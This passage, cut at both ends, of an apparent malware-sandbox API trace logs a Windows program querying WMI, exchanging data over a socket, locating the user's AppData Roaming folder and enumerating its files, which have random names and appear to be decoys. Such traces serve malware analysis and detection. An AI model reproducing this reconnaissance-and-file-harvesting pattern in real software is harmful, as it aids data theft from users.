[3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19eae4 | out: ppvObject=0x19eae4*=0x0) returned 0x80004002 [0266.587] IUnknown:QueryInterface (in: This=0x663848, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e8bc | out: ppvObject=0x19e8bc*=0x0) returned 0x80004002 [0266.588] WbemLocator:IUnknown:AddRef (This=0x66eb70) returned 0x3 [0266.588] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e624 | out: ppvObject=0x19e624*=0x0) returned 0x80004002 [0266.588] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e5d4 | out: ppvObject=0x19e5d4*=0x0) returned 0x80004002 [0266.588] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e5e0 | out: ppvObject=0x19e5e0*=0x66eacc) returned 0x0 [0266.588] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66eacc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e5e8 | out: pCid=0x19e5e8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.588] WbemLocator:IUnknown:Release (This=0x66eacc) returned 0x3 [0266.588] CoGetContextToken (in: pToken=0x19e640 | out: pToken=0x19e640) returned 0x0 [0266.588] CoGetContextToken (in: pToken=0x19ea48 | out: pToken=0x19ea48) returned 0x0 [0266.588] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ead8 | out: ppvObject=0x19ead8*=0x66eb54) returned 0x0 [0266.588] WbemLocator:IRpcOptions:Query (in: This=0x66eb54, pPrx=0x66eb70, dwProperty=2, pdwValue=0x19eb00 | out: pdwValue=0x19eb00) returned 0x80004002 [0266.588] WbemLocator:IUnknown:Release (This=0x66eb54) returned 0x3 [0266.588] WbemLocator:IUnknown:Release (This=0x66eb70) returned 0x2 [0266.588] CoGetContextToken (in: pToken=0x19f020 | out: pToken=0x19f020) returned 0x0 [0266.589] CoGetContextToken (in: pToken=0x19ef80 | out: pToken=0x19ef80) returned 0x0 [0266.589] WbemLocator:IUnknown:QueryInterface (in: This=0x66eb70, riid=0x19f050*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f04c | out: ppvObject=0x19f04c*=0x663848) returned 0x0 [0266.589] IUnknown:AddRef (This=0x663848) returned 0x4 [0266.589] IUnknown:Release (This=0x663848) returned 0x3 [0266.589] IUnknown:Release (This=0x663848) returned 0x2 [0266.589] IUnknown:Release (This=0x6636b8) returned 0x2 [0266.589] SysStringLen (param_1=0x0) returned 0x0 [0266.589] IEnumWbemClassObject:Reset (This=0x663848) returned 0x0 [0266.589] CoTaskMemAlloc (cb=0x4) returned 0x54ba4a8 [0266.590] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba4a8, puReturned=0x2403130 | out: apObjects=0x54ba4a8*=0x0, puReturned=0x2403130*=0x0) returned 0x1 [0266.590] CoTaskMemFree (pv=0x54ba4a8) [0266.590] CoGetContextToken (in: pToken=0x19f198 | out: pToken=0x19f198) returned 0x0 [0266.590] WbemLocator:IUnknown:Release (This=0x66eb70) returned 0x1 [0266.590] IUnknown:Release (This=0x663848) returned 0x0 [0266.591] CoGetContextToken (in: pToken=0x19f198 | out: pToken=0x19f198) returned 0x0 [0266.591] WbemLocator:IUnknown:Release (This=0x66fe70) returned 0x1 [0266.591] IUnknown:Release (This=0x6636b8) returned 0x0 [0266.597] CoCreateGuid (in: pguid=0x19efd4 | out: pguid=0x19efd4*(Data1=0xeac54b42, Data2=0x3ebf, Data3=0x4743, Data4=([0]=0xa3, [1]=0x7a, [2]=0x1a, [3]=0xa4, [4]=0xbf, [5]=0x5, [6]=0x76, [7]=0xef))) returned 0x0 [0266.597] CoCreateGuid (in: pguid=0x19ef04 | out: pguid=0x19ef04*(Data1=0x433fc0, Data2=0xca8c, Data3=0x4652, Data4=([0]=0x95, [1]=0x91, [2]=0xe4, [3]=0xc6, [4]=0x42, [5]=0xc, [6]=0x2d, [7]=0x60))) returned 0x0 [0266.598] send (s=0x348, buf=0x21640db*, len=198, flags=0) returned 198 [0266.599] recv (in: s=0x348, buf=0x2165550, len=8192, flags=0 | out: buf=0x2165550*) returned 125 [0266.715] CoTaskMemAlloc (cb=0x20c) returned 0x5507600 [0266.715] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5507600 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0266.715] CoTaskMemFree (pv=0x5507600) [0266.715] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0266.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1c8) returned 1 [0266.736] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19ecd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0266.736] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\", nBufferLength=0x105, lpBuffer=0x19eca4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\", lpFilePart=0x0) returned 0x26 [0266.736] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\*"), lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd7ba0c8e, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xd7ba0c8e, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x693090 [0266.738] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd7ba0c8e, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xd7ba0c8e, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.739] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74936b0, ftCreationTime.dwHighDateTime=0x1d84d58, ftLastAccessTime.dwLowDateTime=0xf20a8f70, ftLastAccessTime.dwHighDateTime=0x1d84f61, ftLastWriteTime.dwLowDateTime=0xf20a8f70, ftLastWriteTime.dwHighDateTime=0x1d84f61, nFileSizeHigh=0x0, nFileSizeLow=0x2a35, dwReserved0=0x0, dwReserved1=0x0, cFileName="6ENpMWS9JhJZG.m4a", cAlternateFileName="6ENPMW~1.M4A")) returned 1 [0266.739] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d676850, ftCreationTime.dwHighDateTime=0x1d8584a, ftLastAccessTime.dwLowDateTime=0x8b42380, ftLastAccessTime.dwHighDateTime=0x1d85962, ftLastWriteTime.dwLowDateTime=0x8b42380, ftLastWriteTime.dwHighDateTime=0x1d85962, nFileSizeHigh=0x0, nFileSizeLow=0x5f0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="AAPMZs0D.mkv", cAlternateFileName="")) returned 1 [0266.740] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0266.740] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90514f70, ftCreationTime.dwHighDateTime=0x1d84eb3, ftLastAccessTime.dwLowDateTime=0x3e95b9d0, ftLastAccessTime.dwHighDateTime=0x1d8522f, ftLastWriteTime.dwLowDateTime=0x3e95b9d0, ftLastWriteTime.dwHighDateTime=0x1d8522f, nFileSizeHigh=0x0, nFileSizeLow=0x73a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="avbB.swf", cAlternateFileName="")) returned 1 [0266.740] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc91b14e0, ftCreationTime.dwHighDateTime=0x1d85713, ftLastAccessTime.dwLowDateTime=0x6e3118b0, ftLastAccessTime.dwHighDateTime=0x1d85793, ftLastWriteTime.dwLowDateTime=0x6e3118b0, ftLastWriteTime.dwHighDateTime=0x1d85793, nFileSizeHigh=0x0, nFileSizeLow=0xf915, dwReserved0=0x0, dwReserved1=0x0, cFileName="cV6MCygV-q8O4eKotE2r.mp4", cAlternateFileName="CV6MCY~1.MP4")) returned 1 [0266.741] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4f7c890, ftCreationTime.dwHighDateTime=0x1d850e0, ftLastAccessTime.dwLowDateTime=0xf9501ca0, ftLastAccessTime.dwHighDateTime=0x1d855dd, ftLastWriteTime.dwLowDateTime=0xf9501ca0, ftLastWriteTime.dwHighDateTime=0x1d855dd, nFileSizeHigh=0x0, nFileSizeLow=0x4510, dwReserved0=0x0, dwReserved1=0x0, cFileName="dHDQRto.jpg", cAlternateFileName="")) returned 1 [0266.741] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeaa227d0, ftCreationTime.dwHighDateTime=0x1d85334, ftLastAccessTime.dwLowDateTime=0x654a7d80, ftLastAccessTime.dwHighDateTime=0x1d853bb, ftLastWriteTime.dwLowDateTime=0x654a7d80, ftLastWriteTime.dwHighDateTime=0x1d853bb, nFileSizeHigh=0x0, nFileSizeLow=0x3658, dwReserved0=0x0, dwReserved1=0x0, cFileName="DXRnlthwMhGsWlt.m4a", cAlternateFileName="DXRNLT~1.M4A")) returned 1 [0266.741] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f420230, ftCreationTime.dwHighDateTime=0x1d854a8, ftLastAccessTime.dwLowDateTime=0x480b19b0, ftLastAccessTime.dwHighDateTime=0x1d85937, ftLastWriteTime.dwLowDateTime=0x480b19b0, ftLastWriteTime.dwHighDateTime=0x1d85937, nFileSizeHigh=0x0, nFileSizeLow=0x7d13, dwReserved0=0x0, dwReserved1=0x0, cFileName="ELn21JjCr2GE.swf", cAlternateFileName="ELN21J~1.SWF")) returned 1 [0266.742] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad130b00, ftCreationTime.dwHighDateTime=0x1d8518b, ftLastAccessTime.dwLowDateTime=0xf0a0be00, ftLastAccessTime.dwHighDateTime=0x1d852c9, ftLastWriteTime.dwLowDateTime=0xf0a0be00, ftLastWriteTime.dwHighDateTime=0x1d852c9, nFileSizeHigh=0x0, nFileSizeLow=0x9fa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="fUa9MklChhfxY4o.png", cAlternateFileName="FUA9MK~1.PNG")) returned 1 [0266.742] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4088e760, ftCreationTime.dwHighDateTime=0x1d84b15, ftLastAccessTime.dwLowDateTime=0x45f516f0, ftLastAccessTime.dwHighDateTime=0x1d858b3, ftLastWriteTime.dwLowDateTime=0x45f516f0, ftLastWriteTime.dwHighDateTime=0x1d858b3, nFileSizeHigh=0x0, nFileSizeLow=0x13a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="gbwNYdzr1wdfJ3p.rtf", cAlternateFileName="GBWNYD~1.RTF")) returned 1 [0266.742] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9aae6a0, ftCreationTime.dwHighDateTime=0x1d85320, ftLastAccessTime.dwLowDateTime=0x680a0d50, ftLastAccessTime.dwHighDateTime=0x1d8588a, ftLastWriteTime.dwLowDateTime=0x680a0d50, ftLastWriteTime.dwHighDateTime=0x1d8588a, nFileSizeHigh=0x0, nFileSizeLow=0x12852, dwReserved0=0x0, dwReserved1=0x0, cFileName="gTpxFDcCQ9m.jpg", cAlternateFileName="GTPXFD~1.JPG")) returned 1 [0266.743] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd183960, ftCreationTime.dwHighDateTime=0x1d8539a, ftLastAccessTime.dwLowDateTime=0xd67f0f30, ftLastAccessTime.dwHighDateTime=0x1d85577, ftLastWriteTime.dwLowDateTime=0xd67f0f30, ftLastWriteTime.dwHighDateTime=0x1d85577, nFileSizeHigh=0x0, nFileSizeLow=0x4274, dwReserved0=0x0, dwReserved1=0x0, cFileName="hYm1.pdf", cAlternateFileName="")) returned 1 [0266.743] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d60c720, ftCreationTime.dwHighDateTime=0x1d84ed1, ftLastAccessTime.dwLowDateTime=0x82dbc4f0, ftLastAccessTime.dwHighDateTime=0x1d857ce, ftLastWriteTime.dwLowDateTime=0x82dbc4f0, ftLastWriteTime.dwHighDateTime=0x1d857ce, nFileSizeHigh=0x0, nFileSizeLow=0x17396, dwReserved0=0x0, dwReserved1=0x0, cFileName="iq5U9lJYqD.swf", cAlternateFileName="IQ5U9L~1.SWF")) returned 1 [0266.743] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x884e0050, ftCreationTime.dwHighDateTime=0x1d85608, ftLastAccessTime.dwLowDateTime=0xd9b10430, ftLastAccessTime.dwHighDateTime=0x1d85967, ftLastWriteTime.dwLowDateTime=0xd9b10430, ftLastWriteTime.dwHighDateTime=0x1d85967, nFileSizeHigh=0x0, nFileSizeLow=0x17711, dwReserved0=0x0, dwReserved1=0x0, cFileName="jNrBcd6pNYv.swf", cAlternateFileName="JNRBCD~1.SWF")) returned 1 [0266.743] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20f40630, ftCreationTime.dwHighDateTime=0x1d85062, ftLastAccessTime.dwLowDateTime=0x17d6f7c0, ftLastAccessTime.dwHighDateTime=0x1d85548, ftLastWriteTime.dwLowDateTime=0x17d6f7c0, ftLastWriteTime.dwHighDateTime=0x1d85548, nFileSizeHigh=0x0, nFileSizeLow=0x1845d, dwReserved0=0x0, dwReserved1=0x0, cFileName="jR96oJvUhMDCJDNJOHQH.mp4", cAlternateFileName="JR96OJ~1.MP4")) returned 1 [0266.744] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f83010, ftCreationTime.dwHighDateTime=0x1d8540f, ftLastAccessTime.dwLowDateTime=0x32ab950, ftLastAccessTime.dwHighDateTime=0x1d85788, ftLastWriteTime.dwLowDateTime=0x32ab950, ftLastWriteTime.dwHighDateTime=0x1d85788, nFileSizeHigh=0x0, nFileSizeLow=0x17c85, dwReserved0=0x0, dwReserved1=0x0, cFileName="KwPTZG.m4a", cAlternateFileName="")) returned 1 [0266.744] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17cecaa0, ftCreationTime.dwHighDateTime=0x1d84ca6, ftLastAccessTime.dwLowDateTime=0xa59998e0, ftLastAccessTime.dwHighDateTime=0x1d8512b, ftLastWriteTime.dwLowDateTime=0xa59998e0, ftLastWriteTime.dwHighDateTime=0x1d8512b, nFileSizeHigh=0x0, nFileSizeLow=0x1790b, dwReserved0=0x0, dwReserved1=0x0, cFileName="mdD7sKIJa0mS.png", cAlternateFileName="MDD7SK~1.PNG")) returned 1 [0266.744] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xa92f1c4e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f1c4e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0266.745] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc110bc10, ftCreationTime.dwHighDateTime=0x1d84dad, ftLastAccessTime.dwLowDateTime=0x9d530e40, ftLastAccessTime.dwHighDateTime=0x1d854a6, ftLastWriteTime.dwLowDateTime=0x9d530e40, ftLastWriteTime.dwHighDateTime=0x1d854a6, nFileSizeHigh=0x0, nFileSizeLow=0xb39a, dwReserved0=0x0, dwReserved1=0x0, cFileName="mRx qJf6T.flv", cAlternateFileName="MRXQJF~1.FLV")) returned 1 [0266.745] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a1f39b0, ftCreationTime.dwHighDateTime=0x1d84bfd, ftLastAccessTime.dwLowDateTime=0x1df3fd0, ftLastAccessTime.dwHighDateTime=0x1d852a1, ftLastWriteTime.dwLowDateTime=0x1df3fd0, ftLastWriteTime.dwHighDateTime=0x1d852a1, nFileSizeHigh=0x0, nFileSizeLow=0xc6e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="oXTO7AG3NYTFnQ9UI.xlsx", cAlternateFileName="OXTO7A~1.XLS")) returned 1 [0266.746] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ddb51d0, ftCreationTime.dwHighDateTime=0x1d84f6e, ftLastAccessTime.dwLowDateTime=0xe91cba70, ftLastAccessTime.dwHighDateTime=0x1d85941, ftLastWriteTime.dwLowDateTime=0xe91cba70, ftLastWriteTime.dwHighDateTime=0x1d85941, nFileSizeHigh=0x0, nFileSizeLow=0xa0ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="Qs5CoFUJxVt2w.wav", cAlternateFileName="QS5COF~1.WAV")) returned 1 [0266.746] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd976aa40, ftCreationTime.dwHighDateTime=0x1d84c35, ftLastAccessTime.dwLowDateTime=0x47edf8e0, ftLastAccessTime.dwHighDateTime=0x1d85030, ftLastWriteTime.dwLowDateTime=0x47edf8e0, ftLastWriteTime.dwHighDateTime=0x1d85030, nFileSizeHigh=0x0, nFileSizeLow=0x2b1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="rbD_.flv", cAlternateFileName="")) returned 1 [0266.746] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x715d0850, ftCreationTime.dwHighDateTime=0x1d85432, ftLastAccessTime.dwLowDateTime=0x76ddac90, ftLastAccessTime.dwHighDateTime=0x1d85904, ftLastWriteTime.dwLowDateTime=0x76ddac90, ftLastWriteTime.dwHighDateTime=0x1d85904, nFileSizeHigh=0x0, nFileSizeLow=0xd77d, dwReserved0=0x0, dwReserved1=0x0, cFileName="TgVhKLsfzDvrv7wL.xlsx", cAlternateFileName="TGVHKL~1.XLS")) returned 1 [0266.746] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c18b000, ftCreationTime.dwHighDateTime=0x1d8507b, ftLastAccessTime.dwLowDateTime=0xb19eea00, ftLastAccessTime.dwHighDateTime=0x1d85423, ftLastWriteTime.dwLowDateTime=0xb19eea00, ftLastWriteTime.dwHighDateTime=0x1d85423, nFileSizeHigh=0x0, nFileSizeLow=0x2faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="U738z1QTZot.gif", cAlternateFileName="U738Z1~1.GIF")) returned 1 [0266.747] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57a73570, ftCreationTime.dwHighDateTime=0x1d84910, ftLastAccessTime.dwLowDateTime=0xf4cf3720, ftLastAccessTime.dwHighDateTime=0x1d85848, ftLastWriteTime.dwLowDateTime=0xf4cf3720, ftLastWriteTime.dwHighDateTime=0x1d85848, nFileSizeHigh=0x0, nFileSizeLow=0x17ac7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ukd_.swf", cAlternateFileName="")) returned 1 [0266.747] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf67c91f0, ftCreationTime.dwHighDateTime=0x1d84ab3, ftLastAccessTime.dwLowDateTime=0x77788770, ftLastAccessTime.dwHighDateTime=0x1d853ea, ftLastWriteTime.dwLowDateTime=0x77788770, ftLastWriteTime.dwHighDateTime=0x1d853ea, nFileSizeHigh=0x0, nFileSizeLow=0x7739, dwReserved0=0x0, dwReserved1=0x0, cFileName="UPS0Bx1jXlZnQWwwR.gif", cAlternateFileName="UPS0BX~1.GIF")) returned 1 [0266.747] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67acb3d0, ftCreationTime.dwHighDateTime=0x1d84c91, ftLastAccessTime.dwLowDateTime=0x321b990, ftLastAccessTime.dwHighDateTime=0x1d84e7d, ftLastWriteTime.dwLowDateTime=0x321b990, ftLastWriteTime.dwHighDateTime=0x1d84e7d, nFileSizeHigh=0x0, nFileSizeLow=0x116ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="vJUhrbDIDG2Vjt1y3SH.jpg", cAlternateFileName="VJUHRB~1.JPG")) returned 1 [0266.748] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2274570, ftCreationTime.dwHighDateTime=0x1d85781, ftLastAccessTime.dwLowDateTime=0xf40b6280, ftLastAccessTime.dwHighDateTime=0x1d85967, ftLastWriteTime.dwLowDateTime=0xf40b6280, ftLastWriteTime.dwHighDateTime=0x1d85967, nFileSizeHigh=0x0, nFileSizeLow=0x206a, dwReserved0=0x0, dwReserved1=0x0, cFileName="VK2FeE.gif", cAlternateFileName="")) returned 1 [0266.748] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0f8f090, ftCreationTime.dwHighDateTime=0x1d84fde, ftLastAccessTime.dwLowDateTime=0x91735eb0, ftLastAccessTime.dwHighDateTime=0x1d855ad, ftLastWriteTime.dwLowDateTime=0x91735eb0, ftLastWriteTime.dwHighDateTime=0x1d855ad, nFileSizeHigh=0x0, nFileSizeLow=0x16578, dwReserved0=0x0, dwReserved1=0x0, cFileName="wYl_S-QAk.xls", cAlternateFileName="WYL_S-~1.XLS")) returned 1 [0266.748] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa64b8ec0, ftCreationTime.dwHighDateTime=0x1d84bd0, ftLastAccessTime.dwLowDateTime=0x33db0830, ftLastAccessTime.dwHighDateTime=0x1d84c65, ftLastWriteTime.dwLowDateTime=0x33db0830, ftLastWriteTime.dwHighDateTime=0x1d84c65, nFileSizeHigh=0x0, nFileSizeLow=0x27a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yg_SefjCiRqvE5RW6TE.m4a", cAlternateFileName="YG_SEF~1.M4A")) returned 1 [0266.748] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x592051d0, ftCreationTime.dwHighDateTime=0x1d8554e, ftLastAccessTime.dwLowDateTime=0x98875680, ftLastAccessTime.dwHighDateTime=0x1d857f5, ftLastWriteTime.dwLowDateTime=0x98875680, ftLastWriteTime.dwHighDateTime=0x1d857f5, nFileSizeHigh=0x0, nFileSizeLow=0x3bc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="YsKnX.odt", cAlternateFileName="")) returned 1 [0266.749] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e61270, ftCreationTime.dwHighDateTime=0x1d85838, ftLastAccessTime.dwLowDateTime=0x2bca6640, ftLastAccessTime.dwHighDateTime=0x1d858d6, ftLastWriteTime.dwLowDateTime=0x2bca6640, ftLastWriteTime.dwHighDateTime=0x1d858d6, nFileSizeHigh=0x0, nFileSizeLow=0x11c14, dwReserved0=0x0, dwReserved1=0x0, cFileName="zRqQ4.avi", cAlternateFileName="")) returned 1 [0266.749] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ef00 | out: lpFindFileData=0x19ef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38c89500, ftCreationTime.dwHighDateTime=0x1d84c25, ftLastAccessTime.dwLowDateTime=0x46062d20, ftLastAccessTime.dwHighDateTime=0x1d85401, ftLastWriteTime.dwLowDateTime=0x46062d20, 